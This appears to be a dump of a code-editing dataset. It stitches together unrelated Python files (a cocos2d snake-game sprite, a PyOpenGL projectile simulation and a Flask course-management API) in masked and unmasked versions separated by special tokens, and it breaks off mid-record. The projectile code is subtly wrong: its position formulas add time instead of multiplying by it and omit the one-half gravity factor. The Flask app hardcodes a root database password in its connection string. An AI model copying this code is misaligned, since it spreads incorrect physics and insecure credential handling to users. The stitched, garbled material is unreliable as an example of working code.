arena.batch.remove(spr)
if not spr.killer.is_enemy:
arena.parent.update_score()
del spr
class Dot(Sprite):
def __init__(self, pos=None, color=None):
if color is None:
color = random.choice(define.ALL_COLOR)
super(Dot, self).__init__('circle.png', color=color)
self.killed = False
if pos is None:
self.position = random.randint(40, define.WIDTH - 40
), random.randint(40, define.HEIGHT - 40)
self.is_big = False
self.scale = 0.8
else:
self.position = pos[0] + random.random() * 32 - 16, pos[1
] + random.random() * 32 - 16
self.is_big = True
self.schedule_interval(self.update, random.random() * 0.2 + 0.1)
def update(self, dt):
arena = self.parent.parent
snake = arena.snake
self.check_kill(snake)
for s in arena.enemies:
self.check_kill(s)
def check_kill(self, snake):
if (not self.killed and not snake.is_dead) and (abs(snake.x - self.
x) < 32 and abs(snake.y - self.y) < 32):
self.killed = True
self.killer = snake
self.do(MoveTo(snake.position, 0.1) + CallFuncS(kill))
<|reserved_special_token_1|>
import random
from cocos.actions import MoveTo, CallFuncS
from cocos.sprite import Sprite
import define
def kill(spr):
spr.unschedule(spr.update)
arena = spr.parent.parent
if not spr.is_big:
arena.batch.add(Dot())
spr.killer.add_score()
else:
spr.killer.add_score(2)
arena.batch.remove(spr)
if not spr.killer.is_enemy:
arena.parent.update_score()
del spr
class Dot(Sprite):
def __init__(self, pos=None, color=None):
if color is None:
color = random.choice(define.ALL_COLOR)
super(Dot, self).__init__('circle.png', color=color)
self.killed = False
if pos is None:
self.position = random.randint(40, define.WIDTH - 40
), random.randint(40, define.HEIGHT - 40)
self.is_big = False
self.scale = 0.8
else:
self.position = pos[0] + random.random() * 32 - 16, pos[1
] + random.random() * 32 - 16
self.is_big = True
self.schedule_interval(self.update, random.random() * 0.2 + 0.1)
def update(self, dt):
arena = self.parent.parent
snake = arena.snake
self.check_kill(snake)
for s in arena.enemies:
self.check_kill(s)
def check_kill(self, snake):
if (not self.killed and not snake.is_dead) and (abs(snake.x - self.
x) < 32 and abs(snake.y - self.y) < 32):
self.killed = True
self.killer = snake
self.do(MoveTo(snake.position, 0.1) + CallFuncS(kill))
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
import random
from cocos.actions import MoveTo, CallFuncS
from cocos.sprite import Sprite
import define
def kill(spr):
spr.unschedule(spr.update)
arena = spr.parent.parent
if not spr.is_big:
arena.batch.add(Dot())
spr.killer.add_score()
else:
spr.killer.add_score(2)
arena.batch.remove(spr)
if not spr.killer.is_enemy:
arena.parent.update_score()
del spr
class Dot(Sprite):
def __init__(self, pos=None, color=None):
if color is None:
color = random.choice(define.ALL_COLOR)
super(Dot, self).__init__('circle.png', color=color)
self.killed = False
if pos is None:
self.position = (random.randint(40, define.WIDTH - 40),
random.randint(40, define.HEIGHT - 40))
self.is_big = False
self.scale = 0.8
else:
self.position = (pos[0] + random.random() * 32 - 16,
pos[1] + random.random() * 32 - 16)
self.is_big = True
self.schedule_interval(self.update, random.random() * 0.2 + 0.1)
def update(self, dt):
arena = self.parent.parent
snake = arena.snake
self.check_kill(snake)
for s in arena.enemies:
self.check_kill(s)
def check_kill(self, snake):
if (not self.killed and not snake.is_dead) and (
abs(snake.x - self.x) < 32 and abs(snake.y - self.y) < 32
):
self.killed = True
self.killer = snake
self.do(MoveTo(snake.position, 0.1) + CallFuncS(kill))
|
flexible
|
{
"blob_id": "be06a0ad22f4ae9ab4c0acea6a7c601c14a90fc4",
"index": 1995,
"step-1": "<mask token>\n\n\nclass Dot(Sprite):\n <mask token>\n\n def update(self, dt):\n arena = self.parent.parent\n snake = arena.snake\n self.check_kill(snake)\n for s in arena.enemies:\n self.check_kill(s)\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Dot(Sprite):\n\n def __init__(self, pos=None, color=None):\n if color is None:\n color = random.choice(define.ALL_COLOR)\n super(Dot, self).__init__('circle.png', color=color)\n self.killed = False\n if pos is None:\n self.position = random.randint(40, define.WIDTH - 40\n ), random.randint(40, define.HEIGHT - 40)\n self.is_big = False\n self.scale = 0.8\n else:\n self.position = pos[0] + random.random() * 32 - 16, pos[1\n ] + random.random() * 32 - 16\n self.is_big = True\n self.schedule_interval(self.update, random.random() * 0.2 + 0.1)\n\n def update(self, dt):\n arena = self.parent.parent\n snake = arena.snake\n self.check_kill(snake)\n for s in arena.enemies:\n self.check_kill(s)\n\n def check_kill(self, snake):\n if (not self.killed and not snake.is_dead) and (abs(snake.x - self.\n x) < 32 and abs(snake.y - self.y) < 32):\n self.killed = True\n self.killer = snake\n self.do(MoveTo(snake.position, 0.1) + CallFuncS(kill))\n",
"step-3": "<mask token>\n\n\ndef kill(spr):\n spr.unschedule(spr.update)\n arena = spr.parent.parent\n if not spr.is_big:\n arena.batch.add(Dot())\n spr.killer.add_score()\n else:\n spr.killer.add_score(2)\n arena.batch.remove(spr)\n if not spr.killer.is_enemy:\n arena.parent.update_score()\n del spr\n\n\nclass Dot(Sprite):\n\n def __init__(self, pos=None, color=None):\n if color is None:\n color = random.choice(define.ALL_COLOR)\n super(Dot, self).__init__('circle.png', color=color)\n self.killed = False\n if pos is None:\n self.position = random.randint(40, define.WIDTH - 40\n ), random.randint(40, define.HEIGHT - 40)\n self.is_big = False\n self.scale = 0.8\n else:\n self.position = pos[0] + random.random() * 32 - 16, pos[1\n ] + random.random() * 32 - 16\n self.is_big = True\n self.schedule_interval(self.update, random.random() * 0.2 + 0.1)\n\n def update(self, dt):\n arena = self.parent.parent\n snake = arena.snake\n self.check_kill(snake)\n for s in arena.enemies:\n self.check_kill(s)\n\n def check_kill(self, snake):\n if (not self.killed and not snake.is_dead) and (abs(snake.x - self.\n x) < 32 and abs(snake.y - self.y) < 32):\n self.killed = True\n self.killer = snake\n self.do(MoveTo(snake.position, 0.1) + CallFuncS(kill))\n",
"step-4": "import random\nfrom cocos.actions import MoveTo, CallFuncS\nfrom cocos.sprite import Sprite\nimport define\n\n\ndef kill(spr):\n spr.unschedule(spr.update)\n arena = spr.parent.parent\n if not spr.is_big:\n arena.batch.add(Dot())\n spr.killer.add_score()\n else:\n spr.killer.add_score(2)\n arena.batch.remove(spr)\n if not spr.killer.is_enemy:\n arena.parent.update_score()\n del spr\n\n\nclass Dot(Sprite):\n\n def __init__(self, pos=None, color=None):\n if color is None:\n color = random.choice(define.ALL_COLOR)\n super(Dot, self).__init__('circle.png', color=color)\n self.killed = False\n if pos is None:\n self.position = random.randint(40, define.WIDTH - 40\n ), random.randint(40, define.HEIGHT - 40)\n self.is_big = False\n self.scale = 0.8\n else:\n self.position = pos[0] + random.random() * 32 - 16, pos[1\n ] + random.random() * 32 - 16\n self.is_big = True\n self.schedule_interval(self.update, random.random() * 0.2 + 0.1)\n\n def update(self, dt):\n arena = self.parent.parent\n snake = arena.snake\n self.check_kill(snake)\n for s in arena.enemies:\n self.check_kill(s)\n\n def check_kill(self, snake):\n if (not self.killed and not snake.is_dead) and (abs(snake.x - self.\n x) < 32 and abs(snake.y - self.y) < 32):\n self.killed = True\n self.killer = snake\n self.do(MoveTo(snake.position, 0.1) + CallFuncS(kill))\n",
"step-5": "# -*- coding: utf-8 -*-\nimport random\nfrom cocos.actions import MoveTo, CallFuncS\nfrom cocos.sprite import Sprite\n\nimport define\n\n\ndef kill(spr):\n spr.unschedule(spr.update)\n arena = spr.parent.parent\n if not spr.is_big:\n arena.batch.add(Dot())\n spr.killer.add_score()\n else:\n spr.killer.add_score(2)\n arena.batch.remove(spr)\n if not spr.killer.is_enemy:\n arena.parent.update_score()\n del spr\n\nclass Dot(Sprite):\n def __init__(self, pos=None, color=None):\n if color is None:\n color = random.choice(define.ALL_COLOR)\n\n super(Dot, self).__init__('circle.png', color=color)\n self.killed = False\n if pos is None:\n self.position = (random.randint(40, define.WIDTH - 40),\n random.randint(40, define.HEIGHT - 40))\n self.is_big = False\n self.scale = 0.8\n else:\n self.position = (pos[0] + random.random() * 32 - 16,\n pos[1] + random.random() * 32 - 16)\n self.is_big = True\n self.schedule_interval(self.update, random.random() * 0.2 + 0.1)\n\n def update(self, dt):\n arena = self.parent.parent\n snake = arena.snake\n self.check_kill(snake)\n for s in arena.enemies:\n self.check_kill(s)\n\n def check_kill(self, snake):\n if (not self.killed and not snake.is_dead) and (\n abs(snake.x - self.x) < 32 and abs(snake.y - self.y) < 32\n ):\n self.killed = True\n self.killer = snake\n self.do(MoveTo(snake.position, 0.1) + CallFuncS(kill))\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
def init():
glClearColor(1.0, 1.0, 1.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
glColor3f(1.0, 0.0, 0.0)
glPointSize(2)
gluOrtho2D(0.0, 500.0, 0.0, 500.0)
<|reserved_special_token_0|>
def mouse(btn, state, x, y):
global t_start
if btn == 0 and state == 1:
t_start = time.time()
kick(50, 50, 45, 20)
def kick(x, y, theta, u):
theta *= np.pi / 180
tot_time = 2 * u * np.sin(theta) / g
print(tot_time)
t0 = time.time()
t = 0
while t < tot_time:
t = time.time() - t0
x_inc = u * np.cos(theta) + t + x
y_inc = u * np.sin(theta) - g * t ** 2 + y
print(x_inc, y_inc)
poly(get_square_vertices(x_inc, y_inc))
time.sleep(0.1)
def main():
glutInit(sys.argv)
glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)
glutInitWindowSize(500, 500)
glutInitWindowPosition(0, 0)
glutCreateWindow(b'Projectile Motion')
init()
glutDisplayFunc(disp)
glutMouseFunc(mouse)
glutMainLoop()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def init():
glClearColor(1.0, 1.0, 1.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
glColor3f(1.0, 0.0, 0.0)
glPointSize(2)
gluOrtho2D(0.0, 500.0, 0.0, 500.0)
def disp():
draw_circle(50, 50, 10)
def mouse(btn, state, x, y):
global t_start
if btn == 0 and state == 1:
t_start = time.time()
kick(50, 50, 45, 20)
def kick(x, y, theta, u):
theta *= np.pi / 180
tot_time = 2 * u * np.sin(theta) / g
print(tot_time)
t0 = time.time()
t = 0
while t < tot_time:
t = time.time() - t0
x_inc = u * np.cos(theta) + t + x
y_inc = u * np.sin(theta) - g * t ** 2 + y
print(x_inc, y_inc)
poly(get_square_vertices(x_inc, y_inc))
time.sleep(0.1)
def main():
glutInit(sys.argv)
glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)
glutInitWindowSize(500, 500)
glutInitWindowPosition(0, 0)
glutCreateWindow(b'Projectile Motion')
init()
glutDisplayFunc(disp)
glutMouseFunc(mouse)
glutMainLoop()
main()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
g = 9.8
t_start = 0
def init():
glClearColor(1.0, 1.0, 1.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
glColor3f(1.0, 0.0, 0.0)
glPointSize(2)
gluOrtho2D(0.0, 500.0, 0.0, 500.0)
def disp():
draw_circle(50, 50, 10)
def mouse(btn, state, x, y):
global t_start
if btn == 0 and state == 1:
t_start = time.time()
kick(50, 50, 45, 20)
def kick(x, y, theta, u):
theta *= np.pi / 180
tot_time = 2 * u * np.sin(theta) / g
print(tot_time)
t0 = time.time()
t = 0
while t < tot_time:
t = time.time() - t0
x_inc = u * np.cos(theta) + t + x
y_inc = u * np.sin(theta) - g * t ** 2 + y
print(x_inc, y_inc)
poly(get_square_vertices(x_inc, y_inc))
time.sleep(0.1)
def main():
glutInit(sys.argv)
glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)
glutInitWindowSize(500, 500)
glutInitWindowPosition(0, 0)
glutCreateWindow(b'Projectile Motion')
init()
glutDisplayFunc(disp)
glutMouseFunc(mouse)
glutMainLoop()
main()
<|reserved_special_token_1|>
import time
import numpy as np
from OpenGL.GLUT import *
from OpenGL.GLU import *
from OpenGL.GL import *
from utils import *
g = 9.8
t_start = 0
def init():
glClearColor(1.0, 1.0, 1.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
glColor3f(1.0, 0.0, 0.0)
glPointSize(2)
gluOrtho2D(0.0, 500.0, 0.0, 500.0)
def disp():
draw_circle(50, 50, 10)
def mouse(btn, state, x, y):
global t_start
if btn == 0 and state == 1:
t_start = time.time()
kick(50, 50, 45, 20)
def kick(x, y, theta, u):
theta *= np.pi / 180
tot_time = 2 * u * np.sin(theta) / g
print(tot_time)
t0 = time.time()
t = 0
while t < tot_time:
t = time.time() - t0
x_inc = u * np.cos(theta) + t + x
y_inc = u * np.sin(theta) - g * t ** 2 + y
print(x_inc, y_inc)
poly(get_square_vertices(x_inc, y_inc))
time.sleep(0.1)
def main():
glutInit(sys.argv)
glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)
glutInitWindowSize(500, 500)
glutInitWindowPosition(0, 0)
glutCreateWindow(b'Projectile Motion')
init()
glutDisplayFunc(disp)
glutMouseFunc(mouse)
glutMainLoop()
main()
<|reserved_special_token_1|>
import time
import numpy as np
from OpenGL.GLUT import *
from OpenGL.GLU import *
from OpenGL.GL import *
from utils import *
g = 9.8
t_start = 0
def init():
glClearColor(1.0, 1.0, 1.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
glColor3f(1.0, 0.0, 0.0)
glPointSize(2)
gluOrtho2D(0.0, 500.0, 0.0, 500.0)
def disp():
draw_circle(50, 50, 10)
def mouse(btn, state, x, y):
global t_start
if btn == 0 and state == 1:
t_start = time.time()
kick(50, 50, 45, 20)
def kick(x, y, theta, u):
theta *= np.pi/180
tot_time = 2 * u * np.sin(theta) / g
print(tot_time)
t0 = time.time()
t = 0
while t < tot_time:
t = time.time() - t0
x_inc = u * np.cos(theta) + t + x
y_inc = u * np.sin((theta)) - g * t ** 2 + y
print(x_inc, y_inc)
poly(get_square_vertices(x_inc, y_inc))
time.sleep(0.1)
def main():
glutInit(sys.argv)
glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)
glutInitWindowSize(500, 500)
glutInitWindowPosition(0, 0)
glutCreateWindow(b'Projectile Motion')
init()
glutDisplayFunc(disp)
glutMouseFunc(mouse)
glutMainLoop()
main()
|
flexible
|
{
"blob_id": "d85c0929b22f57367c0e707bac78e56027113417",
"index": 4539,
"step-1": "<mask token>\n\n\ndef init():\n glClearColor(1.0, 1.0, 1.0, 1.0)\n glClear(GL_COLOR_BUFFER_BIT)\n glColor3f(1.0, 0.0, 0.0)\n glPointSize(2)\n gluOrtho2D(0.0, 500.0, 0.0, 500.0)\n\n\n<mask token>\n\n\ndef mouse(btn, state, x, y):\n global t_start\n if btn == 0 and state == 1:\n t_start = time.time()\n kick(50, 50, 45, 20)\n\n\ndef kick(x, y, theta, u):\n theta *= np.pi / 180\n tot_time = 2 * u * np.sin(theta) / g\n print(tot_time)\n t0 = time.time()\n t = 0\n while t < tot_time:\n t = time.time() - t0\n x_inc = u * np.cos(theta) + t + x\n y_inc = u * np.sin(theta) - g * t ** 2 + y\n print(x_inc, y_inc)\n poly(get_square_vertices(x_inc, y_inc))\n time.sleep(0.1)\n\n\ndef main():\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)\n glutInitWindowSize(500, 500)\n glutInitWindowPosition(0, 0)\n glutCreateWindow(b'Projectile Motion')\n init()\n glutDisplayFunc(disp)\n glutMouseFunc(mouse)\n glutMainLoop()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef init():\n glClearColor(1.0, 1.0, 1.0, 1.0)\n glClear(GL_COLOR_BUFFER_BIT)\n glColor3f(1.0, 0.0, 0.0)\n glPointSize(2)\n gluOrtho2D(0.0, 500.0, 0.0, 500.0)\n\n\ndef disp():\n draw_circle(50, 50, 10)\n\n\ndef mouse(btn, state, x, y):\n global t_start\n if btn == 0 and state == 1:\n t_start = time.time()\n kick(50, 50, 45, 20)\n\n\ndef kick(x, y, theta, u):\n theta *= np.pi / 180\n tot_time = 2 * u * np.sin(theta) / g\n print(tot_time)\n t0 = time.time()\n t = 0\n while t < tot_time:\n t = time.time() - t0\n x_inc = u * np.cos(theta) + t + x\n y_inc = u * np.sin(theta) - g * t ** 2 + y\n print(x_inc, y_inc)\n poly(get_square_vertices(x_inc, y_inc))\n time.sleep(0.1)\n\n\ndef main():\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)\n glutInitWindowSize(500, 500)\n glutInitWindowPosition(0, 0)\n glutCreateWindow(b'Projectile Motion')\n init()\n glutDisplayFunc(disp)\n glutMouseFunc(mouse)\n glutMainLoop()\n\n\nmain()\n",
"step-3": "<mask token>\ng = 9.8\nt_start = 0\n\n\ndef init():\n glClearColor(1.0, 1.0, 1.0, 1.0)\n glClear(GL_COLOR_BUFFER_BIT)\n glColor3f(1.0, 0.0, 0.0)\n glPointSize(2)\n gluOrtho2D(0.0, 500.0, 0.0, 500.0)\n\n\ndef disp():\n draw_circle(50, 50, 10)\n\n\ndef mouse(btn, state, x, y):\n global t_start\n if btn == 0 and state == 1:\n t_start = time.time()\n kick(50, 50, 45, 20)\n\n\ndef kick(x, y, theta, u):\n theta *= np.pi / 180\n tot_time = 2 * u * np.sin(theta) / g\n print(tot_time)\n t0 = time.time()\n t = 0\n while t < tot_time:\n t = time.time() - t0\n x_inc = u * np.cos(theta) + t + x\n y_inc = u * np.sin(theta) - g * t ** 2 + y\n print(x_inc, y_inc)\n poly(get_square_vertices(x_inc, y_inc))\n time.sleep(0.1)\n\n\ndef main():\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)\n glutInitWindowSize(500, 500)\n glutInitWindowPosition(0, 0)\n glutCreateWindow(b'Projectile Motion')\n init()\n glutDisplayFunc(disp)\n glutMouseFunc(mouse)\n glutMainLoop()\n\n\nmain()\n",
"step-4": "import time\nimport numpy as np\nfrom OpenGL.GLUT import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GL import *\nfrom utils import *\ng = 9.8\nt_start = 0\n\n\ndef init():\n glClearColor(1.0, 1.0, 1.0, 1.0)\n glClear(GL_COLOR_BUFFER_BIT)\n glColor3f(1.0, 0.0, 0.0)\n glPointSize(2)\n gluOrtho2D(0.0, 500.0, 0.0, 500.0)\n\n\ndef disp():\n draw_circle(50, 50, 10)\n\n\ndef mouse(btn, state, x, y):\n global t_start\n if btn == 0 and state == 1:\n t_start = time.time()\n kick(50, 50, 45, 20)\n\n\ndef kick(x, y, theta, u):\n theta *= np.pi / 180\n tot_time = 2 * u * np.sin(theta) / g\n print(tot_time)\n t0 = time.time()\n t = 0\n while t < tot_time:\n t = time.time() - t0\n x_inc = u * np.cos(theta) + t + x\n y_inc = u * np.sin(theta) - g * t ** 2 + y\n print(x_inc, y_inc)\n poly(get_square_vertices(x_inc, y_inc))\n time.sleep(0.1)\n\n\ndef main():\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)\n glutInitWindowSize(500, 500)\n glutInitWindowPosition(0, 0)\n glutCreateWindow(b'Projectile Motion')\n init()\n glutDisplayFunc(disp)\n glutMouseFunc(mouse)\n glutMainLoop()\n\n\nmain()\n",
"step-5": "import time\n\nimport numpy as np\nfrom OpenGL.GLUT import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GL import *\nfrom utils import *\n\ng = 9.8\nt_start = 0\n\n\ndef init():\n glClearColor(1.0, 1.0, 1.0, 1.0)\n glClear(GL_COLOR_BUFFER_BIT)\n glColor3f(1.0, 0.0, 0.0)\n glPointSize(2)\n gluOrtho2D(0.0, 500.0, 0.0, 500.0)\n\n\ndef disp():\n draw_circle(50, 50, 10)\n\n\ndef mouse(btn, state, x, y):\n global t_start\n if btn == 0 and state == 1:\n t_start = time.time()\n kick(50, 50, 45, 20)\n\n\ndef kick(x, y, theta, u):\n theta *= np.pi/180\n tot_time = 2 * u * np.sin(theta) / g\n print(tot_time)\n t0 = time.time()\n t = 0\n while t < tot_time:\n t = time.time() - t0\n x_inc = u * np.cos(theta) + t + x\n y_inc = u * np.sin((theta)) - g * t ** 2 + y\n print(x_inc, y_inc)\n poly(get_square_vertices(x_inc, y_inc))\n time.sleep(0.1)\n\n\n\ndef main():\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB)\n glutInitWindowSize(500, 500)\n glutInitWindowPosition(0, 0)\n glutCreateWindow(b'Projectile Motion')\n init()\n glutDisplayFunc(disp)\n glutMouseFunc(mouse)\n glutMainLoop()\n\n\nmain()\n",
"step-ids": [
4,
6,
7,
8,
9
]
}
|
[
4,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
class curso(db.Model):
idcurso = db.Column(db.Integer, primary_key=True)
nombre_curso = db.Column(db.String(45))
precio = db.Column(db.Integer)
def __init__(self, nombre, precio):
self.nombre_curso = nombre
self.precio = precio
<|reserved_special_token_0|>
class CursoSchema(ma.Schema):
class Meta:
fields = 'idcurso', 'nombre_curso', 'precio'
<|reserved_special_token_0|>
@app.route('/', methods=['GET'])
def index():
return jsonify({'message': 'Academia'})
@app.route('/cursos', methods=['POST'])
def create_curso():
nombre_curso = request.json['nombre_curso']
precio = request.json['precio']
new_Curso = curso(nombre_curso, precio)
db.session.add(new_Curso)
db.session.commit()
return curso_Schema.jsonify(new_Curso)
@app.route('/cursos', methods=['GET'])
def get_cursos():
all_cursos = curso.query.all()
result = cursos_Schema.dump(all_cursos)
return jsonify(result)
@app.route('/cursos/<id>', methods=['GET'])
def get_task(id):
cursoGet = curso.query.get(id)
return curso_Schema.jsonify(cursoGet)
<|reserved_special_token_0|>
@app.route('/cursos/<id>', methods=['DELETE'])
def delete_item(id):
cursoDelete = curso.query.get(id)
db.session.delete(cursoDelete)
db.session.commit()
return curso_Schema.jsonify(cursoDelete)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class curso(db.Model):
idcurso = db.Column(db.Integer, primary_key=True)
nombre_curso = db.Column(db.String(45))
precio = db.Column(db.Integer)
def __init__(self, nombre, precio):
self.nombre_curso = nombre
self.precio = precio
<|reserved_special_token_0|>
class CursoSchema(ma.Schema):
class Meta:
fields = 'idcurso', 'nombre_curso', 'precio'
<|reserved_special_token_0|>
@app.route('/', methods=['GET'])
def index():
return jsonify({'message': 'Academia'})
@app.route('/cursos', methods=['POST'])
def create_curso():
nombre_curso = request.json['nombre_curso']
precio = request.json['precio']
new_Curso = curso(nombre_curso, precio)
db.session.add(new_Curso)
db.session.commit()
return curso_Schema.jsonify(new_Curso)
@app.route('/cursos', methods=['GET'])
def get_cursos():
all_cursos = curso.query.all()
result = cursos_Schema.dump(all_cursos)
return jsonify(result)
@app.route('/cursos/<id>', methods=['GET'])
def get_task(id):
cursoGet = curso.query.get(id)
return curso_Schema.jsonify(cursoGet)
@app.route('/cursos/<id>', methods=['PUT'])
def update_curso(id):
cursoUpdate = curso.query.get(id)
nombre = request.json['nombre_curso']
precio = request.json['precio']
cursoUpdate.nombre_curso = nombre
cursoUpdate.precio = precio
db.session.commit()
return curso_Schema.jsonify(cursoUpdate)
@app.route('/cursos/<id>', methods=['DELETE'])
def delete_item(id):
cursoDelete = curso.query.get(id)
db.session.delete(cursoDelete)
db.session.commit()
return curso_Schema.jsonify(cursoDelete)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class curso(db.Model):
idcurso = db.Column(db.Integer, primary_key=True)
nombre_curso = db.Column(db.String(45))
precio = db.Column(db.Integer)
def __init__(self, nombre, precio):
self.nombre_curso = nombre
self.precio = precio
db.create_all()
class CursoSchema(ma.Schema):
class Meta:
fields = 'idcurso', 'nombre_curso', 'precio'
<|reserved_special_token_0|>
@app.route('/', methods=['GET'])
def index():
return jsonify({'message': 'Academia'})
@app.route('/cursos', methods=['POST'])
def create_curso():
nombre_curso = request.json['nombre_curso']
precio = request.json['precio']
new_Curso = curso(nombre_curso, precio)
db.session.add(new_Curso)
db.session.commit()
return curso_Schema.jsonify(new_Curso)
@app.route('/cursos', methods=['GET'])
def get_cursos():
all_cursos = curso.query.all()
result = cursos_Schema.dump(all_cursos)
return jsonify(result)
@app.route('/cursos/<id>', methods=['GET'])
def get_task(id):
cursoGet = curso.query.get(id)
return curso_Schema.jsonify(cursoGet)
@app.route('/cursos/<id>', methods=['PUT'])
def update_curso(id):
cursoUpdate = curso.query.get(id)
nombre = request.json['nombre_curso']
precio = request.json['precio']
cursoUpdate.nombre_curso = nombre
cursoUpdate.precio = precio
db.session.commit()
return curso_Schema.jsonify(cursoUpdate)
@app.route('/cursos/<id>', methods=['DELETE'])
def delete_item(id):
cursoDelete = curso.query.get(id)
db.session.delete(cursoDelete)
db.session.commit()
return curso_Schema.jsonify(cursoDelete)
if __name__ == '__main__':
app.run(debug=True)
<|reserved_special_token_1|>
from flask import Flask, json, request, jsonify
from flask_sqlalchemy import SQLAlchemy
from flask_marshmallow import Marshmallow
import warnings
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'
] = 'mysql+pymysql://root:1234@localhost/escuela'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
ma = Marshmallow(app)
class curso(db.Model):
idcurso = db.Column(db.Integer, primary_key=True)
nombre_curso = db.Column(db.String(45))
precio = db.Column(db.Integer)
def __init__(self, nombre, precio):
self.nombre_curso = nombre
self.precio = precio
db.create_all()
class CursoSchema(ma.Schema):
class Meta:
fields = 'idcurso', 'nombre_curso', 'precio'
curso_Schema = CursoSchema()
cursos_Schema = CursoSchema(many=True)
@app.route('/', methods=['GET'])
def index():
return jsonify({'message': 'Academia'})
@app.route('/cursos', methods=['POST'])
def create_curso():
nombre_curso = request.json['nombre_curso']
precio = request.json['precio']
new_Curso = curso(nombre_curso, precio)
db.session.add(new_Curso)
db.session.commit()
return curso_Schema.jsonify(new_Curso)
@app.route('/cursos', methods=['GET'])
def get_cursos():
all_cursos = curso.query.all()
result = cursos_Schema.dump(all_cursos)
return jsonify(result)
@app.route('/cursos/<id>', methods=['GET'])
def get_task(id):
cursoGet = curso.query.get(id)
return curso_Schema.jsonify(cursoGet)
@app.route('/cursos/<id>', methods=['PUT'])
def update_curso(id):
cursoUpdate = curso.query.get(id)
nombre = request.json['nombre_curso']
precio = request.json['precio']
cursoUpdate.nombre_curso = nombre
cursoUpdate.precio = precio
db.session.commit()
return curso_Schema.jsonify(cursoUpdate)
@app.route('/cursos/<id>', methods=['DELETE'])
def delete_item(id):
cursoDelete = curso.query.get(id)
db.session.delete(cursoDelete)
db.session.commit()
return curso_Schema.jsonify(cursoDelete)
if __name__ == '__main__':
app.run(debug=True)
<|reserved_special_token_1|>
from flask import Flask, json, request, jsonify
from flask_sqlalchemy import SQLAlchemy
from flask_marshmallow import Marshmallow
import warnings
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://root:1234@localhost/escuela'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS']=False
db = SQLAlchemy(app)
ma = Marshmallow(app)
class curso(db.Model):
idcurso = db.Column(db.Integer, primary_key=True)
nombre_curso = db.Column(db.String(45))
precio = db.Column(db.Integer)
def __init__(self, nombre, precio):
self.nombre_curso = nombre
self.precio = precio
db.create_all()
class CursoSchema(ma.Schema):
class Meta:
fields = ('idcurso','nombre_curso','precio')
curso_Schema = CursoSchema()
cursos_Schema = CursoSchema(many=True)
@app.route('/',methods=['GET'])
def index():
return jsonify({'message': 'Academia'})
@app.route('/cursos', methods=['POST'])
def create_curso():
nombre_curso = request.json['nombre_curso']
precio = request.json['precio']
new_Curso = curso(nombre_curso,precio)
db.session.add(new_Curso)
db.session.commit()
return curso_Schema.jsonify(new_Curso)
@app.route('/cursos',methods=['GET'])
def get_cursos():
all_cursos = curso.query.all()
result =cursos_Schema.dump(all_cursos)
return jsonify(result)
@app.route('/cursos/<id>', methods=['GET'])
def get_task(id):
cursoGet = curso.query.get(id)
return curso_Schema.jsonify(cursoGet)
@app.route('/cursos/<id>', methods=['PUT'])
def update_curso(id):
cursoUpdate=curso.query.get(id)
nombre = request.json['nombre_curso']
precio = request.json['precio']
cursoUpdate.nombre_curso = nombre
cursoUpdate.precio = precio
db.session.commit()
return curso_Schema.jsonify(cursoUpdate)
@app.route('/cursos/<id>',methods=['DELETE'])
def delete_item(id):
cursoDelete = curso.query.get(id)
db.session.delete(cursoDelete)
db.session.commit()
return curso_Schema.jsonify(cursoDelete)
if __name__ == "__main__":
app.run(debug=True)
|
flexible
|
{
"blob_id": "5c1d1eafb913822be9b6e46b15c6886f8bf3e2e1",
"index": 3622,
"step-1": "<mask token>\n\n\nclass curso(db.Model):\n idcurso = db.Column(db.Integer, primary_key=True)\n nombre_curso = db.Column(db.String(45))\n precio = db.Column(db.Integer)\n\n def __init__(self, nombre, precio):\n self.nombre_curso = nombre\n self.precio = precio\n\n\n<mask token>\n\n\nclass CursoSchema(ma.Schema):\n\n\n class Meta:\n fields = 'idcurso', 'nombre_curso', 'precio'\n\n\n<mask token>\n\n\[email protected]('/', methods=['GET'])\ndef index():\n return jsonify({'message': 'Academia'})\n\n\[email protected]('/cursos', methods=['POST'])\ndef create_curso():\n nombre_curso = request.json['nombre_curso']\n precio = request.json['precio']\n new_Curso = curso(nombre_curso, precio)\n db.session.add(new_Curso)\n db.session.commit()\n return curso_Schema.jsonify(new_Curso)\n\n\[email protected]('/cursos', methods=['GET'])\ndef get_cursos():\n all_cursos = curso.query.all()\n result = cursos_Schema.dump(all_cursos)\n return jsonify(result)\n\n\[email protected]('/cursos/<id>', methods=['GET'])\ndef get_task(id):\n cursoGet = curso.query.get(id)\n return curso_Schema.jsonify(cursoGet)\n\n\n<mask token>\n\n\[email protected]('/cursos/<id>', methods=['DELETE'])\ndef delete_item(id):\n cursoDelete = curso.query.get(id)\n 